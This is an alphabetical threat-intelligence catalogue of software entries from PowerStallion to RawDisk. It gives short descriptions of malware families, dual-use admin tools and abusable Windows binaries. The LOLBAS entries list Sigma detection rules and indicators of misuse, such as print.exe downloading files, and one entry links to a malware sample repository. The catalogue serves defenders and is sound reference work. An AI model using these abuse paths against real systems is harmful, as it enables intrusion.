The tag is: misp-galaxy:software="PowerStallion"

Powermud - Associated Software

The tag is: misp-galaxy:software="Powermud - Associated Software"

POWERSTATS

The tag is: misp-galaxy:software="POWERSTATS"

POWERTON

[POWERTON](https://app.tidalcyber.com/software/b3c28750-3825-4e4d-ab92-f39a6b0827dd) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac). At least two variants of the backdoor have been identified, with the later version containing improved functionality.<sup>[[FireEye APT33 Guardrail](https://app.tidalcyber.com/references/4b4c9e72-eee1-4fa4-8dcb-501ec49882b0)]</sup>

The tag is: misp-galaxy:software="POWERTON"

PowerTool

PowerTool is a tool used to remove rootkits, as well as to detect, analyze, and fix kernel structure modifications.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="PowerTool"

PowGoop

[PowGoop](https://app.tidalcyber.com/software/7ed984bb-d098-4d0a-90fd-b03e68842479) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) as their main loader.<sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup><sup>[[CYBERCOM Iranian Intel Cyber January 2022](https://app.tidalcyber.com/references/671e1559-c7dc-4cb4-a9a1-21776f2ae56a)]</sup>

The tag is: misp-galaxy:software="PowGoop"

POWRUNER

[POWRUNER](https://app.tidalcyber.com/software/67cdb7a6-5142-43fa-8b8d-d9bdd2a4dae4) is a PowerShell script that sends and receives commands to and from the C2 server. <sup>[[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)]</sup>

The tag is: misp-galaxy:software="POWRUNER"

Presentationhost.exe - Associated Software

<sup>[[Presentationhost.exe - LOLBAS Project](/references/37539e72-18f5-435a-a949-f9fa5991149a)]</sup>

The tag is: misp-galaxy:software="Presentationhost.exe - Associated Software"

Presentationhost

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: File is used for executing Browser applications

Author: Oddvar Moe

Paths: * C:\Windows\System32\Presentationhost.exe * C:\Windows\SysWOW64\Presentationhost.exe

Detection: * Sigma: [proc_creation_win_lolbin_presentationhost_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml) * Sigma: [proc_creation_win_lolbin_presentationhost.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml) * IOC: Execution of .xbap files may not be common on production workstations<sup>[[Presentationhost.exe - LOLBAS Project](/references/37539e72-18f5-435a-a949-f9fa5991149a)]</sup>

The tag is: misp-galaxy:software="Presentationhost"

Prestige

[Prestige](https://app.tidalcyber.com/software/4fb5b109-5a5c-5441-a0f9-f639ead5405e) ransomware has been used by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.<sup>[[Microsoft Prestige ransomware October 2022](https://app.tidalcyber.com/references/b57e1181-461b-5ada-a739-873ede1ec079)]</sup>

The tag is: misp-galaxy:software="Prestige"

Prikormka

[Prikormka](https://app.tidalcyber.com/software/1da989a8-41cc-4e89-a435-a88acb72ae0d) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. <sup>[[ESET Operation Groundbait](https://app.tidalcyber.com/references/218e69fd-558c-459b-9a57-ad2ee3e96296)]</sup>

The tag is: misp-galaxy:software="Prikormka"

Print.exe - Associated Software

<sup>[[Print.exe - LOLBAS Project](/references/696ce89a-b3a1-4993-b30d-33a669a57031)]</sup>

The tag is: misp-galaxy:software="Print.exe - Associated Software"

Print

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to send files to the printer

Author: Oddvar Moe

Paths: * C:\Windows\System32\print.exe * C:\Windows\SysWOW64\print.exe

Detection: * Sigma: [proc_creation_win_print_remote_file_copy.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml) * IOC: Print.exe retrieving files from internet * IOC: Print.exe creating executable files on disk<sup>[[Print.exe - LOLBAS Project](/references/696ce89a-b3a1-4993-b30d-33a669a57031)]</sup>

The tag is: misp-galaxy:software="Print"

PrintBrm.exe - Associated Software

<sup>[[PrintBrm.exe - LOLBAS Project](/references/a7ab6f09-c22f-4627-afb1-c13a963efca5)]</sup>

The tag is: misp-galaxy:software="PrintBrm.exe - Associated Software"

PrintBrm

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Printer Migration Command-Line Tool

Author: Elliot Killick

Paths: * C:\Windows\System32\spool\tools\PrintBrm.exe

Detection: * Sigma: [proc_creation_win_lolbin_printbrm.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml) * IOC: PrintBrm.exe should not be run on a normal workstation<sup>[[PrintBrm.exe - LOLBAS Project](/references/a7ab6f09-c22f-4627-afb1-c13a963efca5)]</sup>

The tag is: misp-galaxy:software="PrintBrm"

Microsoft Sysinternals ProcDump - Associated Software

The tag is: misp-galaxy:software="Microsoft Sysinternals ProcDump - Associated Software"

ProcDump

ProcDump is a tool used to monitor applications for CPU spikes and generate crash dumps.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="ProcDump"

Process Hacker

Process Hacker is a tool used to remove rootkits.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Process Hacker"

ProLock

[ProLock](https://app.tidalcyber.com/software/c8af096e-c71e-4751-b203-70c285b7a7bd) is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with [QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea). [ProLock](https://app.tidalcyber.com/software/c8af096e-c71e-4751-b203-70c285b7a7bd) is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.<sup>[[Group IB Ransomware September 2020](https://app.tidalcyber.com/references/52d0e16f-9a20-442f-9a17-686e51d7e32b)]</sup>

The tag is: misp-galaxy:software="ProLock"

ProtocolHandler.exe - Associated Software

<sup>[[ProtocolHandler.exe - LOLBAS Project](/references/1f678111-dfa3-4c06-9359-816b9ca12cd0)]</sup>

The tag is: misp-galaxy:software="ProtocolHandler.exe - Associated Software"

ProtocolHandler

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Office binary

Author: Nir Chako

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe * C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe * C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe

Resources: None Provided

Detection: * Sigma: [proc_creation_win_lolbin_protocolhandler_download.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml) * IOC: Suspicious Office application Internet/network traffic<sup>[[ProtocolHandler.exe - LOLBAS Project](/references/1f678111-dfa3-4c06-9359-816b9ca12cd0)]</sup>

The tag is: misp-galaxy:software="ProtocolHandler"

Proton

[Proton](https://app.tidalcyber.com/software/d3bcdbc4-5998-4e50-bd45-cba6a3278427) is a macOS backdoor focusing on data theft and credential access <sup>[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup>.

The tag is: misp-galaxy:software="Proton"

Provlaunch.exe - Associated Software

<sup>[[Provlaunch.exe - LOLBAS Project](/references/56a57369-4707-4dff-ad23-431109f24233)]</sup>

The tag is: misp-galaxy:software="Provlaunch.exe - Associated Software"

Provlaunch

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Launcher process

Author: Grzegorz Tworek

Paths: * c:\windows\system32\provlaunch.exe

Detection: * Sigma: [proc_creation_win_provlaunch_potential_abuse.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml) * Sigma: [proc_creation_win_provlaunch_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml) * Sigma: [proc_creation_win_registry_provlaunch_provisioning_command.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml) * Sigma: [registry_set_provisioning_command_abuse.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml) * IOC: c:\windows\system32\provlaunch.exe executions * IOC: Creation/existence of HKLM\SOFTWARE\Microsoft\Provisioning\Commands subkeys<sup>[[Provlaunch.exe - LOLBAS Project](/references/56a57369-4707-4dff-ad23-431109f24233)]</sup>

The tag is: misp-galaxy:software="Provlaunch"

Proxysvc

[Proxysvc](https://app.tidalcyber.com/software/94f43629-243e-49dc-8c2b-cdf4fc15cf83) is a malicious DLL used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://app.tidalcyber.com/software/94f43629-243e-49dc-8c2b-cdf4fc15cf83) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. <sup>[[McAfee GhostSecret](https://app.tidalcyber.com/references/d1cd4f5b-253c-4833-8905-49fb58e7c016)]</sup>

The tag is: misp-galaxy:software="Proxysvc"

PS1

[PS1](https://app.tidalcyber.com/software/8cd401ac-a233-4395-a8ae-d75db9d5b845) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://app.tidalcyber.com/groups/) campaign.<sup>[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]</sup>

The tag is: misp-galaxy:software="PS1"

PsExec

[PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.<sup>[[Russinovich Sysinternals](https://app.tidalcyber.com/references/72d27aca-62c5-4e96-9977-c41951aaa888)]</sup><sup>[[SANS PsExec](https://app.tidalcyber.com/references/a8d1e40d-b291-443c-86cc-edf6db00b898)]</sup>

The tag is: misp-galaxy:software="PsExec"

Psr.exe - Associated Software

<sup>[[Psr.exe - LOLBAS Project](/references/a00782cf-f6b2-4b63-9d8d-97efe17e11c0)]</sup>

The tag is: misp-galaxy:software="Psr.exe - Associated Software"

Psr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Problem Steps Recorder, used to record screen and clicks.

Author: Leon Rodenko

Paths: * c:\windows\system32\psr.exe * c:\windows\syswow64\psr.exe

Detection: * Sigma: [proc_creation_win_psr_capture_screenshots.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml) * IOC: psr.exe spawned * IOC: suspicious activity when running with "/gui 0" flag<sup>[[Psr.exe - LOLBAS Project](/references/a00782cf-f6b2-4b63-9d8d-97efe17e11c0)]</sup>

The tag is: misp-galaxy:software="Psr"

Psylo

The tag is: misp-galaxy:software="Psylo"

Pterodo - Associated Software

The tag is: misp-galaxy:software="Pterodo - Associated Software"

Pteranodon

The tag is: misp-galaxy:software="Pteranodon"

Pubprn.vbs - Associated Software

<sup>[[Pubprn.vbs - LOLBAS Project](/references/d2b6b9fd-5f80-41c0-ac22-06b78c86a9e5)]</sup>

The tag is: misp-galaxy:software="Pubprn.vbs - Associated Software"

Pubprn

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Proxy execution with Pubprn.vbs

Author: Oddvar Moe

Paths: * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs

The tag is: misp-galaxy:software="Pubprn"

Pulseway

According to joint Cybersecurity Advisory AA23-320A (November 2023), Pulseway is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:software="Pulseway"

ShellTea - Associated Software

The tag is: misp-galaxy:software="ShellTea - Associated Software"

PUNCHBUGGY

[PUNCHBUGGY](https://app.tidalcyber.com/software/d8999d60-3818-4d75-8756-8a55531254d8) is a backdoor malware used by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) that has been observed targeting POS networks in the hospitality industry. <sup>[[Morphisec ShellTea June 2019](https://app.tidalcyber.com/references/1b6ce918-651a-480d-8305-82bccbf42e96)]</sup><sup>[[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)]</sup> <sup>[[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]</sup>

The tag is: misp-galaxy:software="PUNCHBUGGY"

PSVC - Associated Software

<sup>[[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]</sup>

The tag is: misp-galaxy:software="PSVC - Associated Software"

PUNCHTRACK

[PUNCHTRACK](https://app.tidalcyber.com/software/1638d99b-fbcf-40ec-ac48-802ce5be520a) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) to scrape payment card data. <sup>[[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)]</sup> <sup>[[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]</sup>

The tag is: misp-galaxy:software="PUNCHTRACK"

Pupy

[Pupy](https://app.tidalcyber.com/software/0a8bedc2-b404-4a9a-b4f5-ff90ff8294be) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. <sup>[[GitHub Pupy](https://app.tidalcyber.com/references/69d5cb59-6545-4405-8ca6-733db99d3ee9)]</sup> It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). <sup>[[GitHub Pupy](https://app.tidalcyber.com/references/69d5cb59-6545-4405-8ca6-733db99d3ee9)]</sup> [Pupy](https://app.tidalcyber.com/software/0a8bedc2-b404-4a9a-b4f5-ff90ff8294be) is publicly available on GitHub. <sup>[[GitHub Pupy](https://app.tidalcyber.com/references/69d5cb59-6545-4405-8ca6-733db99d3ee9)]</sup>

The tag is: misp-galaxy:software="Pupy"

PuTTy

PuTTy is an open-source SSH and telnet client.<sup>[[PuTTY Download Page](/references/bf278270-128e-483b-9f09-ce24f5f6ed80)]</sup>

The tag is: misp-galaxy:software="PuTTy"

pwdump

The tag is: misp-galaxy:software="pwdump"

PyDCrypt

[PyDCrypt](https://app.tidalcyber.com/software/51b2c56e-7d64-4e15-b1bd-45a980c9c44d) is malware written in Python designed to deliver [DCSrv](https://app.tidalcyber.com/software/26ae3cd1-6710-4807-b674-957bd67d3e76). It has been used by [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) since at least September 2021, with each sample tailored for its intended victim organization.<sup>[[Checkpoint MosesStaff Nov 2021](https://app.tidalcyber.com/references/d6da2849-cff0-408a-9f09-81a33fc88a56)]</sup>

The tag is: misp-galaxy:software="PyDCrypt"

Mespinoza - Associated Software

The tag is: misp-galaxy:software="Mespinoza - Associated Software"

Pysa

[Pysa](https://app.tidalcyber.com/software/e0d5ecce-eca0-4f01-afcc-0c8e92323016) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.<sup>[[CERT-FR PYSA April 2020](https://app.tidalcyber.com/references/4e502db6-2e09-4422-9dcc-1e10e701e122)]</sup>

The tag is: misp-galaxy:software="Pysa"

Pinkslipbot - Associated Software

The tag is: misp-galaxy:software="Pinkslipbot - Associated Software"

QBot - Associated Software

The tag is: misp-galaxy:software="QBot - Associated Software"

QuackBot - Associated Software

<sup>[[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)]</sup>

The tag is: misp-galaxy:software="QuackBot - Associated Software"

QakBot

[QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. [QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably [ProLock](https://app.tidalcyber.com/software/c8af096e-c71e-4751-b203-70c285b7a7bd) and [Egregor]([Trend Micro Qakbot December 2020(https://app.tidalcyber.com/references/c061ce45-1452-4c11-9586-bd5eb2d718ab)]</sup><sup>[[Red Canary Qbot](https://app.tidalcyber.com/references/6e4960e7-ae5e-4b68-ac85-4bd84e940634)]</sup><sup>[[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)]</sup><sup>[[ATT QakBot April 2021](https://app.tidalcyber.com/references/c7b0b3f3-e9ea-4159-acd1-f6d92ed41828)]</sup>

The tag is: misp-galaxy:software="QakBot"

QUADAGENT

The tag is: misp-galaxy:software="QUADAGENT"

xRAT - Associated Software

The tag is: misp-galaxy:software="xRAT - Associated Software"

QuasarRAT

[QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b) is developed in the C# language.<sup>[[GitHub QuasarRAT](https://app.tidalcyber.com/references/c87e4427-af97-4e93-9596-ad5a588aa171)]</sup><sup>[[Volexity Patchwork June 2018](https://app.tidalcyber.com/references/d3ed7dd9-0941-4160-aa6a-c0244c63560f)]</sup>

The tag is: misp-galaxy:software="QuasarRAT"

Tunnus - Associated Software

<sup>[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]</sup>

The tag is: misp-galaxy:software="Tunnus - Associated Software"

QUIETCANARY

[QUIETCANARY](https://app.tidalcyber.com/software/52d3515c-5184-5257-bf24-56adccb4cccd) is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.<sup>[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]</sup>

The tag is: misp-galaxy:software="QUIETCANARY"

QUIETEXIT

[QUIETEXIT](https://app.tidalcyber.com/software/947ab087-7550-577f-9ae9-5e82e9910610) is a novel backdoor, based on the open-source Dropbear SSH client-server software, that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2021. [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) has deployed [QUIETEXIT](https://app.tidalcyber.com/software/947ab087-7550-577f-9ae9-5e82e9910610) on opaque network appliances that typically don’t support antivirus or endpoint detection and response tools within a victim environment.<sup>[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]</sup>

The tag is: misp-galaxy:software="QUIETEXIT"

QuietSieve

[QuietSieve](https://app.tidalcyber.com/software/dcdb74c5-4445-49bd-9f9c-236a7ecc7904) is an information stealer that has been used by [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) since at least 2021.<sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

The tag is: misp-galaxy:software="QuietSieve"

Quser.exe - Associated Software

The tag is: misp-galaxy:software="Quser.exe - Associated Software"

Quser

According to joint Cybersecurity Advisory AA23-250A (September 2023), Quser is "a valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server".<sup>[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]</sup>

The tag is: misp-galaxy:software="Quser"

Raccoon Stealer 2.0

Raccoon Stealer is one of the most heavily used information & credential stealers (""infostealers"") in recent years. The ""2.0"" version of Raccoon Stealer was observed in mid-2022, featuring new capabilities designed to improve its stealth.<sup>[[Sekoia.io Raccoon Stealer June 28 2022](/references/df0c9cbd-8692-497e-9f81-cf9e44a3a5cd)]</sup> Raccoon Stealer is licensed as a service, and like many other modern infostealer families, the relatively low cost of a Raccoon Stealer subscription (around $75 for weeklong access) contributes to the malware’s popularity. Victim credentials acquired via Raccoon Stealer are often resold on illicit, automated marketplaces on the dark web.

More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).

The tag is: misp-galaxy:software="Raccoon Stealer 2.0"

Ragnar Locker

[Ragnar Locker](https://app.tidalcyber.com/software/d25f7acd-a995-4b8b-8ffe-ccc9703cdf5f) is a ransomware that has been in use since at least December 2019.<sup>[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]</sup><sup>[[Cynet Ragnar Apr 2020](https://app.tidalcyber.com/references/aeb637ea-0b83-42a0-8f68-9fdc59aa462a)]</sup>

The tag is: misp-galaxy:software="Ragnar Locker"

Raindrop

[Raindrop](https://app.tidalcyber.com/software/80295aeb-59e3-4c5d-ac39-9879158f8d23) is a loader used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a). It was discovered in January 2021 and was likely used since at least May 2020.<sup>[[Symantec RAINDROP January 2021](https://app.tidalcyber.com/references/9185092d-3d99-466d-b885-f4e76fe74b6b)]</sup><sup>[[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]</sup>

The tag is: misp-galaxy:software="Raindrop"

RainyDay

The tag is: misp-galaxy:software="RainyDay"

Ramsay

[Ramsay](https://app.tidalcyber.com/software/dc307b3c-9bc5-4624-b0bc-4807fa1fc57b) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://app.tidalcyber.com/software/dc307b3c-9bc5-4624-b0bc-4807fa1fc57b) and the [Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8)-associated Retro malware.<sup>[[Eset Ramsay May 2020](https://app.tidalcyber.com/references/3c149b0b-f37c-4d4e-aa61-351c87fd57ce)]</sup><sup>[[Antiy CERT Ramsay April 2020](https://app.tidalcyber.com/references/280636da-fa21-472c-947c-651a628ea2cd)]</sup>

The tag is: misp-galaxy:software="Ramsay"

Rasautou.exe - Associated Software

<sup>[[Rasautou.exe - LOLBAS Project](/references/dc299f7a-403b-4a22-9386-0be3e160d185)]</sup>

The tag is: misp-galaxy:software="Rasautou.exe - Associated Software"

Rasautou

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Remote Access Dialer

Author: Tony Lambert

Paths: * C:\Windows\System32\rasautou.exe

Detection: * Sigma: [win_rasautou_dll_execution.yml](https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml) * IOC: rasautou.exe command line containing -d and -p<sup>[[Rasautou.exe - LOLBAS Project](/references/dc299f7a-403b-4a22-9386-0be3e160d185)]</sup>

The tag is: misp-galaxy:software="Rasautou"

Raspberry Robin

A highly active worm that spreads through removable media devices and abuses built-in Windows utilities after initial infection of the host. Raspberry Robin has evolved into a major malware delivery threat, with links to infections involving Cobalt Strike, SocGholish, Truebot, and ultimately ransomware.<sup>[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)]</sup>

Delivers: Cobalt Strike<sup>[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)]</sup>, SocGholish<sup>[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)]</sup>, Truebot<sup>[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)]</sup><sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/raspberryrobin/

The tag is: misp-galaxy:software="Raspberry Robin"

RATANKBA

[RATANKBA](https://app.tidalcyber.com/software/40466d7d-a107-46aa-a6fc-180e0eef2c6b) is a remote controller tool used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). [RATANKBA](https://app.tidalcyber.com/software/40466d7d-a107-46aa-a6fc-180e0eef2c6b) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://app.tidalcyber.com/software/40466d7d-a107-46aa-a6fc-180e0eef2c6b) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. <sup>[[Lazarus RATANKBA](https://app.tidalcyber.com/references/e3f9853f-29b0-4219-a488-a6ecfa16b09f)]</sup> <sup>[[RATANKBA](https://app.tidalcyber.com/references/7d08ec64-7fb8-4520-b26b-95b0dee891fe)]</sup>

The tag is: misp-galaxy:software="RATANKBA"

RawDisk

[RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.<sup>[[EldoS RawDisk ITpro](https://app.tidalcyber.com/references/a6cf3d1d-2310-42bb-9324-495b4e94d329)]</sup><sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>

The tag is: misp-galaxy:software="RawDisk"

FIENDCRY - Associated Software

